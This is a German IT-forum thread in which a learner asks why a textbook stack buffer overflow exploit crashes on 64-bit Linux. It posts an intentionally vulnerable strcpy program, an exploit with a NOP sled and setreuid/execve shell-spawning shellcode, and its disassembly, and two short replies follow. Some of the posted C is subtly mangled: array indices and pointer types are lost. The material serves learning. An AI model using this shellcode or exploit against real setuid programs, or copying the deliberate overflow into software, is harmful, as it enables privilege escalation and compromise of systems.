Zum Inhalt springen

Speicherzugriffsfehler

michel3712

Empfohlene Beiträge

Hallo,

mein Problem ist wie so oft der berühmte Speicherzugriffsfehler.

Obwohl man meinen sollte, daß der falsche Zugriff auf den Speicher ja im allgemeinen relativ leicht auszumachen und zu beheben ist, gilt das für mich leider in diesem Fall nicht.

Es handelt sich um zwei kleine Programme, wobei eines - bitte nicht erschrecken - ein sogenanntes Exploit ist und das andere (vuln.c) ein winziges Programm mit absichtlich falscher Speicherverwaltung, um den Einsatz des Exploits zu demonstrieren. (Es geht mir hier natürlich nicht darum, das Exploit für irgenwelche fragwürdigen Zwecke einzusetzen, sondern lediglich darum, besser die Systemzusammenhänge zu verstehen.)

Diese Programm sind Beispiele aus einem Buch und sollten eigentlich laufen. Bei mir

unter Linux (Linux 2.6.22.5-31-default x86_64) tun sie das aber leider nicht. Der fragliche Shellcode - die Wurzel des Übels ? - funktioniert auch nicht unter dem NASM (Assembler)

Auch hier gibt es einen Speicherzugriffsfehler. Es stehen zwei unterschiedliche Shellcodes zur Verfügung und der aktuelle (nicht auskommentierte) ist am Schluß auch nochmal dargestellt in der disassemblierten Form. Mit beiden Codes gibt's den Speicherzugriffsfehler.

----------------------------------------------------------------------------------------------------------------------------

Das erste winzige Programm ist vuln.c :

int main(int argc, char *argv)

{

char buffer[500];

strcpy(buffer,argv[1]); // absichtlich falsche Speicherverwaltung

return 0;

}

---------------------------------------------------------------------------------------------------------

Das zweite Programm ist exploit.c:

#include <stdlib.h>

char shellcode[]=

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x0d\x5b"

"\x31\xc0\x50\xb0\x0b\x31\xd2\x53\x89\xe1\xcd\x80\xe8"

"\xee\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* char shellcode[]=

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43"

"\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80"

"\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; */

unsigned long sp(void)

{ __asm__("movl %esp,%eax");}

int main(int argc, char *argv)

{

int i, offset;

long esp, ret, *addr_ptr;

char *buffer, *ptr;

offset=0;

esp=sp();

ret=esp-offset;

printf("Stack pointer esp (ESP) : 0x%x\n", esp);

printf("Offset from ESP : 0x%x\n", offset);

printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)

buffer=malloc(600);

// BIS hier

// gesamten Puffer mit der gewünschten ret-Adresse füllen

ptr = buffer;

addr_ptr=(long*) ptr;

for(i=0; i<600; i+=4)

{ *(addr_ptr++) = ret; }

// Die ersten 200 Bytes des Puffers mit NOP-Anweisungen füllen

for (i=0; i< 200; i++)

{ buffer = '\x90'; }

// Den Shellcode nach dem NOP-Sled füllen

ptr = buffer + 200;

for(i=0; i < strlen(shellcode); i++)

{ *(ptr++)= shellcode; }

// Den String beenden

buffer[600-1] = 0;

// Jetzt das Programm ./vulvn mit dem manip. Argument als buffer aufrufen

execl("./vuln", "vuln", buffer, 0);

// Speicherpuffer freigeben

free(buffer);

return 0;

}

------------------------------------------------------------------------------------------------------------------

Beide Programme werden übersetzt mit gcc -o exploit exploit.c bzw. gcc -o vuln vuln.c.

Folgende Warnungen erscheinen:

exploit.c: In Funktion »main«:

exploit.c:22: Warnung: Unverträgliche implizite Deklaration der eingebauten Funktion »printf«

exploit.c:41: Warnung: Unverträgliche implizite Deklaration der eingebauten Funktion »strlen«

exploit.c:48: Warnung: Unverträgliche implizite Deklaration der eingebauten Funktion »execl«

vuln.c: In Funktion »main«:

vuln.c:5: Warnung: Unverträgliche implizite Deklaration der eingebauten Funktion »strcpy«

vuln.c:5: Warnung: Übergabe des Arguments 2 von »strcpy« erzeugt Zeiger von Ganzzahl ohne Typkonvertierung

Bei dem Aufruf ./exploit erscheint dann der Speicherzugriffsfehler.

Der disassemblierte Programmcode des aktuellen nicht auskommentierten Shellcodes lautet:

BITS 32

; setreuid (uid_t ruid, uid_t euid)

xor eax,eax

mov al,70

xor ebx,ebx

xor ecx,ecx

int 0x80

; execve (const char *filename, char *const arg[], char *const envp[])

jmp short two

one:

pop ebx

xor eax,eax

push eax

mov al,11

xor edx,edx

push ebx

mov ecx,esp

int 0x80

two:

call one

db '/bin/sh'

Ich wäre schon für einen Tip sehr dankbar, der mich auf die richtige Fährte bringt

Beste Grüße

Michel

Ja, das habe ich mir auch überlegt. Allerdings habe ich mich verschrieben. Der Assemblercode funktioniert. Wegen meines 64-Bit-Systems hatte ich am Anfang Linkerprobleme, die ich nur durch einen Zusatz für den Linker beseitigen konnte. Mag sein, daß das in ähnlicher Weise auch für den C-Code gilt.

Aber wie kann ich das - falls es das ist - unter c berücksichtigen? Fest steht, der Assembler-shellcode wird explizit mit BIT 32 eingeleitet.

Du versuchst in fremden Speicher zu schreiben und bekommst einen Speicherzugriffsfehler ;)

Ich weiß nicht so genau wie Linux das handhabt, aber ich gehe mal stark davon aus das auch dort verhindert wird das ein Prozess auf den Speicher eines anderen Prozesses zugreifen darf und würde da jetzt vermuten das dies geschieht wenn du über die Grenzen deines Buffer hinaus schreibst.

Dein Kommentar

Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung wiederherstellen

Nur 75 Emojis sind erlaubt.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

Fachinformatiker.de, 2024 by SE Internet Services

fidelogo_small.png

Schicke uns eine Nachricht!

Fachinformatiker.de ist die größte IT-Community
rund um Ausbildung, Job, Weiterbildung für IT-Fachkräfte.

Fachinformatiker.de App

Download on the App Store
Get it on Google Play

Kontakt

Hier werben?
Oder sende eine E-Mail an

Social media u. feeds

Jobboard für Fachinformatiker und IT-Fachkräfte

• Neu erstellen...